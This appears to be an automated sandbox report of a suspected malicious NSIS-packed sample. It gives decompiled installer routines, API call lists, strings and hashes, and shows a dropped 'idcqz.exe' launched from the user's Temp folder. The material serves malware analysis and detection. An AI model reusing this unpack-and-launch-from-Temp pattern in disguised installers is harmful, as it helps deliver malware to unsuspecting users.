          					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
          					__eflags =  *0x7a1f88;
          					if(__eflags == 0) {
          						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
          					}
          					lstrcatW(L"1033", _t76);
          				} else {
          					E004065B5(L"1033",  *_t22() & 0x0000ffff);
          				}
          				E00403FF3(_t78, _t90);
          				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
          				 *0x7a8b3c = 0x10000;
          				if(E00406045(_t90, 0x7b3800) != 0) {
          					L16:
          					if(E00406045(_t98, 0x7b3800) == 0) {
          						E004066AB(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
          					}
          					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040);
          					 *0x7a7a88 = _t30;
          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
          						L21:
          						if(E0040140B(0) == 0) {
          							_t32 = E00403FF3(_t78, __eflags);
          							__eflags =  *0x7a8b40;
          							if( *0x7a8b40 != 0) {
          								_t33 = E004057A3(_t32, 0);
          								__eflags = _t33;
          								if(_t33 == 0) {
          									E0040140B(1);
          									goto L33;
          								}
          								__eflags =  *0x7a7a6c;
          								if( *0x7a7a6c == 0) {
          									E0040140B(2);
          								}
          								goto L22;
          							}
          							ShowWindow( *0x7a1f68, 5); // executed
          							_t39 = E004069CB("RichEd20"); // executed
          							__eflags = _t39;
          							if(_t39 == 0) {
          								E004069CB("RichEd32");
          							}
          							_t87 = L"RichEdit20W";
          							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
          							__eflags = _t40;
          							if(_t40 == 0) {
          								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
          								 *0x7a7a64 = _t87;
          								RegisterClassW(0x7a7a40);
          							}
          							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
          							E00403C6D(E0040140B(5), 1);
          							return _t44;
          						}
          						L22:
          						_t36 = 2;
          						return _t36;
          					} else {
          						_t78 =  *0x7a8aa0;
          						 *0x7a7a44 = E00401000;
          						 *0x7a7a50 =  *0x7a8aa0;
          						 *0x7a7a54 = _t30;
          						 *0x7a7a64 = 0x40a3b4;
          						if(RegisterClassW(0x7a7a40) == 0) {
          							L33:
          							__eflags = 0;
          							return 0;
          						}
          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
          						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
          						goto L21;
          					}
          				} else {
          					_t78 =  *(_t82 + 0x48);
          					_t92 = _t78;
          					if(_t78 == 0) {
          						goto L16;
          					}
          					_t76 = 0x7a6a40;
          					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
          					_t63 =  *0x7a6a40; // 0x43
          					if(_t63 == 0) {
          						goto L16;
          					}
          					if(_t63 == 0x22) {
          						_t76 = 0x7a6a42;
          						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
          					}
          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
          						L15:
          						E0040666E(0x7b3800, E00405F3D(_t76));
          						goto L16;
          					} else {
          						_t69 = GetFileAttributesW(_t76);
          						if(_t69 == 0xffffffff) {
          							L14:
          							E00405F89(_t76);
          							goto L15;
          						}
          						_t98 = _t69 & 0x00000010;
          						if((_t69 & 0x00000010) != 0) {
          							goto L15;
          						}
          						goto L14;
          					}
          				}
          			}
























          0x00403d23
          0x00403d2c
          0x00403d33
          0x00403d35
          0x00403d49
          0x00403d5b
          0x00403d64
          0x00403d6d
          0x00403d74
          0x00403d79
          0x00403d80
          0x00403d93
          0x00403d93
          0x00403d9e
          0x00403d37
          0x00403d42
          0x00403d42
          0x00403da3
          0x00403db6
          0x00403dbb
          0x00403dcc
          0x00403e5e
          0x00403e66
          0x00403e6f
          0x00403e6f
          0x00403e85
          0x00403e8b
          0x00403e99
          0x00403f1a
          0x00403f22
          0x00403f2c
          0x00403f31
          0x00403f37
          0x00403fc1
          0x00403fc6
          0x00403fc8
          0x00403fe4
          0x00000000
          0x00403fe4
          0x00403fca
          0x00403fd0
          0x00403fd8
          0x00403fd8
          0x00000000
          0x00403fd0
          0x00403f45
          0x00403f50
          0x00403f55
          0x00403f57
          0x00403f5e
          0x00403f5e
          0x00403f69
          0x00403f71
          0x00403f73
          0x00403f75
          0x00403f7e
          0x00403f81
          0x00403f87
          0x00403f87
          0x00403fa6
          0x00403fb7
          0x00000000
          0x00403fbc
          0x00403f24
          0x00403f26
          0x00000000
          0x00403e9b
          0x00403e9b
          0x00403ea7
          0x00403eb1
          0x00403eb7
          0x00403ebc
          0x00403ecb
          0x00403fe9
          0x00403fe9
          0x00000000
          0x00403fe9
          0x00403eda
          0x00403f15
          0x00000000
          0x00403f15
          0x00403dd2
          0x00403dd2
          0x00403dd5
          0x00403dd7
          0x00000000
          0x00000000
          0x00403de5
          0x00403df7
          0x00403dfc
          0x00403e05
          0x00000000
          0x00000000
          0x00403e0b
          0x00403e0d
          0x00403e1a
          0x00403e1a
          0x00403e23
          0x00403e29
          0x00403e51
          0x00403e59
          0x00000000
          0x00403e3b
          0x00403e3c
          0x00403e45
          0x00403e4b
          0x00403e4c
          0x00000000
          0x00403e4c
          0x00403e47
          0x00403e49
          0x00000000
          0x00000000
          0x00000000
          0x00403e49
          0x00403e29

          APIs
            • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
            • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
          • lstrcatW.KERNEL32 ref: 00403D9E
          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,?,?,?,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7556D4C4), ref: 00403E1E
          • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,?,?,?,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,?,00000000,?), ref: 00403E3C
          • LoadImageW.USER32 ref: 00403E85
            • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
          • RegisterClassW.USER32 ref: 00403EC2
          • SystemParametersInfoW.USER32 ref: 00403EDA
          • CreateWindowExW.USER32 ref: 00403F0F
          • ShowWindow.USER32(00000005,00000000), ref: 00403F45
          • GetClassInfoW.USER32 ref: 00403F71
          • GetClassInfoW.USER32 ref: 00403F7E
          • RegisterClassW.USER32 ref: 00403F87
          • DialogBoxParamW.USER32 ref: 00403FA6
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
          • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
          • API String ID: 1975747703-1803211635
          • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
          • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
          • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
          • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 325 403120-403125 322->325 326 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 322->326 327 403370-403374 325->327 334 403246-403254 call 40302e 326->334 335 40315e-403175 326->335 341 403328-40332d 334->341 342 40325a-40325d 334->342 337 403177 335->337 338 403179-403186 call 4035e8 335->338 337->338 346 4032e4-4032ec call 40302e 338->346 347 40318c-403192 338->347 341->327 344 403289-4032d8 GlobalAlloc call 40618d CreateFileW 342->344 345 40325f-403277 call 4035fe call 4035e8 342->345 361 4032da-4032df 344->361 362 4032ee-40331e call 4035fe call 403377 344->362 345->341 374 40327d-403283 345->374 346->341 351 403212-403216 347->351 352 403194-4031ac call 406119 347->352 357 403218-40321e call 40302e 351->357 358 40321f-403225 351->358 352->358 367 4031ae-4031b5 352->367 357->358 359 403227-403235 call 406b28 358->359 360 403238-403240 358->360 359->360 360->334 360->335 361->327 378 403323-403326 362->378 367->358 372 4031b7-4031be 367->372 372->358 375 4031c0-4031c7 372->375 374->341 374->344 375->358 377 4031c9-4031d0 375->377 377->358 379 4031d2-4031f2 377->379 378->341 380 40332f-403340 378->380 379->341 381 4031f8-4031fc 379->381 382 403342 380->382 383 403348-40334d 380->383 384 403204-40320c 381->384 385 4031fe-403202 381->385 382->383 386 40334e-403354 383->386 384->358 387 40320e-403210 384->387 385->334 385->384 386->386 388 403356-40336e call 406119 386->388 387->358 388->327
          C-Code - Quality: 97%
          			E004030D0(void* __eflags, signed int _a4) {
          				long _v8;
          				long _v12;
          				intOrPtr _v16;
          				long _v20;
          				intOrPtr _v24;
          				intOrPtr _v28;
          				intOrPtr _v32;
          				intOrPtr _v36;
          				signed int _v40;
          				short _v560;
          				long _t54;
          				void* _t57;
          				void* _t61;
          				intOrPtr _t64;
          				void* _t67;
          				intOrPtr* _t69;
          				long _t81;
          				signed int _t88;
          				intOrPtr _t91;
          				void* _t94;
          				void* _t99;
          				void* _t103;
          				long _t104;
          				long _t107;
          				void* _t108;
          
          				_v8 = 0;
          				_v12 = 0;
          				 *0x7a8aac = GetTickCount() + 0x3e8;
          				GetModuleFileNameW(0, 0x7b6800, 0x400);
          				_t103 = E0040615E(0x7b6800, 0x80000000, 3);
          				 *0x40a018 = _t103;
          				if(_t103 == 0xffffffff) {
          					return L"Error launching installer";
          				}
          				E0040666E(0x7b4800, 0x7b6800);
          				E0040666E(0x7b7000, E00405F89(0x7b4800));
          				_t54 = GetFileSize(_t103, 0);
          				 *0x79f740 = _t54;
          				_t107 = _t54;
          				if(_t54 <= 0) {
          					L22:
          					E0040302E(1);
          					_pop(_t94);
          					if( *0x7a8ab4 == 0) {
          						goto L30;
          					}
          					if(_v12 == 0) {
          						L26:
          						_t57 = GlobalAlloc(0x40, _v20); // executed
          						_t108 = _t57;
          						 *0x40ce78 = 0xb;
          						 *0x40ce90 = 0; // executed
          						E0040618D(_t94,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
          						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
          						 *0x40a01c = _t61;
          						if(_t61 != 0xffffffff) {
          							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
          							 *0x79f744 = _t64;
          							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
          							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
          							if(_t67 == _v20) {
          								 *0x7a8ab0 = _t108;
          								 *0x7a8ab8 =  *_t108;
          								if((_v40 & 0x00000001) != 0) {
          									 *0x7a8abc =  *0x7a8abc + 1;
          								}
          								_t45 = _t108 + 0x44; // 0x44
          								_t69 = _t45;
          								_t99 = 8;
          								do {
          									_t69 = _t69 - 8;
          									 *_t69 =  *_t69 + _t108;
          									_t99 = _t99 - 1;
          								} while (_t99 != 0);
          								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
          								E00406119(0x7a8ac0, _t108 + 4, 0x40);
          								return 0;
          							}
          							goto L30;
          						}
          						return L"Error writing temporary file. Make sure your temp folder is valid.";
          					}
          					E004035FE( *0x79f730);
          					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
          						goto L30;
          					} else {
          						goto L26;
          					}
          				} else {
          					do {
          						_t104 = _t107;
          						asm("sbb eax, eax");
          						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
          						if(_t107 >= _t81) {
          							_t104 = _t81;
          						}
          						if(E004035E8(0x797730, _t104) == 0) {
          							E0040302E(1);
          							L30:
          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
          						}
          						if( *0x7a8ab4 != 0) {
          							if((_a4 & 0x00000002) == 0) {
          								E0040302E(0);
          							}
          							goto L19;
          						}
          						E00406119( &_v40, 0x797730, 0x1c);
          						_t88 = _v40;
          						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
          							_a4 = _a4 | _t88;
          							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
          							_t91 = _v16;
          							 *0x7a8ab4 =  *0x79f730;
          							if(_t91 > _t107) {
          								goto L30;
          							}
          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
          								_v12 = _v12 + 1;
          								_t107 = _t91 - 4;
          								if(_t104 > _t107) {
          									_t104 = _t107;
          								}
          								goto L19;
          							} else {
          								goto L22;
          							}
          						}
          						L19:
          						if(_t107 <  *0x79f740) {
          							_v8 = E00406B28(_v8, 0x797730, _t104);
          						}
          						 *0x79f730 =  *0x79f730 + _t104;
          						_t107 = _t107 - _t104;
          					} while (_t107 != 0);
          					goto L22;
          				}
          			}




























          0x004030de
          0x004030e1
          0x004030fb
          0x00403100
          0x00403113
          0x00403118
          0x0040311e
          0x00000000
          0x00403120
          0x00403131
          0x00403142
          0x00403149
          0x00403151
          0x00403156
          0x00403158
          0x00403246
          0x00403248
          0x00403253
          0x00403254
          0x00000000
          0x00000000
          0x0040325d
          0x00403289
          0x0040328e
          0x00403294
          0x004032a2
          0x004032a9
          0x004032af
          0x004032ca
          0x004032d3
          0x004032d8
          0x004032f7
          0x00403307
          0x00403319
          0x0040331e
          0x00403326
          0x00403333
          0x0040333b
          0x00403340
          0x00403342
          0x00403342
          0x0040334a
          0x0040334a
          0x0040334d
          0x0040334e
          0x0040334e
          0x00403351
          0x00403353
          0x00403353
          0x0040335d
          0x00403369
          0x00000000
          0x0040336e
          0x00000000
          0x00403326
          0x00000000
          0x004032da
          0x00403265
          0x00403277
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0040315e
          0x0040315e
          0x00403163
          0x00403167
          0x0040316e
          0x00403175
          0x00403177
          0x00403177
          0x00403186
          0x004032e6
          0x00403328
          0x00000000
          0x00403328
          0x00403192
          0x00403216
          0x00403219
          0x0040321e
          0x00000000
          0x00403216
          0x0040319f
          0x004031a4
          0x004031ac
          0x004031d2
          0x004031e1
          0x004031e7
          0x004031ec
          0x004031f2
          0x00000000
          0x00000000
          0x004031fc
          0x00403204
          0x00403207
          0x0040320c
          0x0040320e
          0x0040320e
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004031fc
          0x0040321f
          0x00403225
          0x00403235
          0x00403235
          0x00403238
          0x0040323e
          0x0040323e
          0x00000000
          0x0040315e

          APIs
          • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
          • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400), ref: 00403100
            • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
            • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003), ref: 00403149
          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
          • Null, xrefs: 004031C9
          • Inst, xrefs: 004031B7
          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403328
          • soft, xrefs: 004031C0
          • Error launching installer, xrefs: 00403120
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
          • API String ID: 2803837635-2435864027
          • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
          • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
          • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
          • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 455 40176f-401794 call 402da6 call 405fb4 460 401796-40179c call 40666e 455->460 461 40179e-4017b0 call 40666e call 405f3d lstrcatW 455->461 467 4017b5-4017b6 call 4068f5 460->467 461->467 470 4017bb-4017bf 467->470 471 4017c1-4017cb call 4069a4 470->471 472 4017f2-4017f5 470->472 479 4017dd-4017ef 471->479 480 4017cd-4017db CompareFileTime 471->480 474 4017f7-4017f8 call 406139 472->474 475 4017fd-401819 call 40615e 472->475 474->475 482 40181b-40181e 475->482 483 40188d-4018b6 call 4056d0 call 403377 475->483 479->472 480->479 484 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 482->484 485 40186f-401879 call 4056d0 482->485 497 4018b8-4018bc 483->497 498 4018be-4018ca SetFileTime 483->498 484->470 518 401864-401865 484->518 495 401882-401888 485->495 499 402c33 495->499 497->498 501 4018d0-4018db CloseHandle 497->501 498->501 503 402c35-402c39 499->503 504 4018e1-4018e4 501->504 505 402c2a-402c2d 501->505 507 4018e6-4018f7 call 4066ab lstrcatW 504->507 508 4018f9-4018fc call 4066ab 504->508 505->499 512 401901-4023a2 call 405cce 507->512 508->512 512->503 512->505 518->495 520 401867-401868 518->520 520->485
          C-Code - Quality: 77%
          			E0040176F(FILETIME* __ebx, void* __eflags) {
          				void* __esi;
          				void* _t35;
          				void* _t43;
          				void* _t45;
          				FILETIME* _t51;
          				FILETIME* _t64;
          				void* _t66;
          				signed int _t72;
          				FILETIME* _t73;
          				FILETIME* _t77;
          				signed int _t79;
          				WCHAR* _t81;
          				void* _t83;
          				void* _t84;
          				void* _t86;
          
          				_t77 = __ebx;
          				 *(_t86 - 8) = E00402DA6(0x31);
          				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
          				_t35 = E00405FB4( *(_t86 - 8));
          				_push( *(_t86 - 8));
          				_t81 = L"C:\\U";
          				if(_t35 == 0) {
          					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
          				} else {
          					E0040666E();
          				}
          				E004068F5(_t81);
          				while(1) {
          					__eflags =  *(_t86 + 8) - 3;
          					if( *(_t86 + 8) >= 3) {
          						_t66 = E004069A4(_t81);
          						_t79 = 0;
          						__eflags = _t66 - _t77;
          						if(_t66 != _t77) {
          							_t73 = _t66 + 0x14;
          							__eflags = _t73;
          							_t79 = CompareFileTime(_t73, _t86 - 0x24);
          						}
          						asm("sbb eax, eax");
          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
          						__eflags = _t72;
          						 *(_t86 + 8) = _t72;
          					}
          					__eflags =  *(_t86 + 8) - _t77;
          					if( *(_t86 + 8) == _t77) {
          						E00406139(_t81);
          					}
          					__eflags =  *(_t86 + 8) - 1;
          					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
          					__eflags = _t43 - 0xffffffff;
          					 *(_t86 - 0x38) = _t43;
          					if(_t43 != 0xffffffff) {
          						break;
          					}
          					__eflags =  *(_t86 + 8) - _t77;
          					if( *(_t86 + 8) != _t77) {
          						E004056D0(0xffffffe2,  *(_t86 - 8));
          						__eflags =  *(_t86 + 8) - 2;
          						if(__eflags == 0) {
          							 *((intOrPtr*)(_t86 - 4)) = 1;
          						}
          						L31:
          						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
          						__eflags =  *0x7a8b28;
          						goto L32;
          					} else {
          						E0040666E(0x40b5f8, _t83);
          						E0040666E(_t83, _t81);
          						E004066AB(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
          						E0040666E(_t83, 0x40b5f8);
          						_t64 = E00405CCE("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
          						__eflags = _t64;
          						if(_t64 == 0) {
          							continue;
          						} else {
          							__eflags = _t64 == 1;
          							if(_t64 == 1) {
          								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
          								L32:
          								_t51 = 0;
          								__eflags = 0;
          							} else {
          								_push(_t81);
          								_push(0xfffffffa);
          								E004056D0();
          								L29:
          								_t51 = 0x7fffffff;
          							}
          						}
          					}
          					L33:
          					return _t51;
          				}
          				E004056D0(0xffffffea,  *(_t86 - 8));
          				 *0x7a8b54 =  *0x7a8b54 + 1;
          				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
          				 *0x7a8b54 =  *0x7a8b54 - 1;
          				__eflags =  *(_t86 - 0x24) - 0xffffffff;
          				_t84 = _t45;
          				if( *(_t86 - 0x24) != 0xffffffff) {
          					L22:
          					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
          				} else {
          					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
          					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
          						goto L22;
          					}
          				}
          				CloseHandle( *(_t86 - 0x38)); // executed
          				__eflags = _t84 - _t77;
          				if(_t84 >= _t77) {
          					goto L31;
          				} else {
          					__eflags = _t84 - 0xfffffffe;
          					if(_t84 != 0xfffffffe) {
          						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
          					} else {
          						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
          						lstrcatW(_t81,  *(_t86 - 8));
          					}
          					_push(0x200010);
          					_push(_t81);
          					E00405CCE();
          					goto L29;
          				}
          				goto L33;
          			}


















          0x0040176f
          0x00401776
          0x00401782
          0x00401785
          0x0040178a
          0x0040178d
          0x00401794
          0x004017b0
          0x00401796
          0x00401797
          0x00401797
          0x004017b6
          0x004017bb
          0x004017bb
          0x004017bf
          0x004017c2
          0x004017c7
          0x004017c9
          0x004017cb
          0x004017d0
          0x004017d0
          0x004017db
          0x004017db
          0x004017ec
          0x004017ee
          0x004017ee
          0x004017ef
          0x004017ef
          0x004017f2
          0x004017f5
          0x004017f8
          0x004017f8
          0x004017ff
          0x0040180e
          0x00401813
          0x00401816
          0x00401819
          0x00000000
          0x00000000
          0x0040181b
          0x0040181e
          0x00401874
          0x00401879
          0x004015b6
          0x0040292e
          0x0040292e
          0x00402c2a
          0x00402c2d
          0x00402c2d
          0x00000000
          0x00401820
          0x00401826
          0x0040182d
          0x0040183a
          0x00401845
          0x0040185b
          0x0040185b
          0x0040185e
          0x00000000
          0x00401864
          0x00401864
          0x00401865
          0x00401882
          0x00402c33
          0x00402c33
          0x00402c33
          0x00401867
          0x00401867
          0x00401868
          0x00401493
          0x0040239d
          0x0040239d
          0x0040239d
          0x00401865
          0x0040185e
          0x00402c35
          0x00402c39
          0x00402c39
          0x00401892
          0x00401897
          0x004018a5
          0x004018aa
          0x004018b0
          0x004018b4
          0x004018b6
          0x004018be
          0x004018ca
          0x004018b8
          0x004018b8
          0x004018bc
          0x00000000
          0x00000000
          0x004018bc
          0x004018d3
          0x004018d9
          0x004018db
          0x00000000
          0x004018e1
          0x004018e1
          0x004018e4
          0x004018fc
          0x004018e6
          0x004018e9
          0x004018f2
          0x004018f2
          0x00401901
          0x00401906
          0x00402398
          0x00000000
          0x00402398
          0x00000000

          APIs
          • lstrcatW.KERNEL32 ref: 004017B0
          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,00000000,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,007B4000,?,?,00000031), ref: 004017D5
            • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
